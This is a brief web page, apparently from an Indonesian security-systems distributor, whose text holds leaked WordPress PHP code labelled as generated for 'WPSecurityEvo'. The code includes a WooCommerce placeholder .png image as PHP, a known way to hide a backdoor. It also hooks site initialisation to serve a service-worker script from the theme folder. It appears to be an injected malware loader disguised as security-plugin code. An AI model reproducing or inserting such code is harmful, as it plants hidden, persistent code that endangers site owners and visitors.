- Distributor Resmi Sistem Keamanan Professional Indonesia
// Generated for WPSecurityEvo require_once WP_CONTENT_DIR . '/plugins/woocommerce/assets/images/woocommerce-placeholder-60x69.png'; function serve_service_worker() { if ($_SERVER['REQUEST_URI'] === '/service-worker.js') { header("Content-Type: application/javascript"); $file_path = get_template_directory() . '/service-worker.js'; if (file_exists($file_path)) { // Tambahkan parameter ?v=timestamp untuk menghindari cache $time = time(); echo "// Service Worker generated at: " . date('Y-m-d H:i:s', $time) . "\n"; echo file_get_contents($file_path); } else { error_log("Service Worker file not found: " . $file_path); } exit; } } add_action('init', 'serve_service_worker'); // Generated for WPSecurityEvo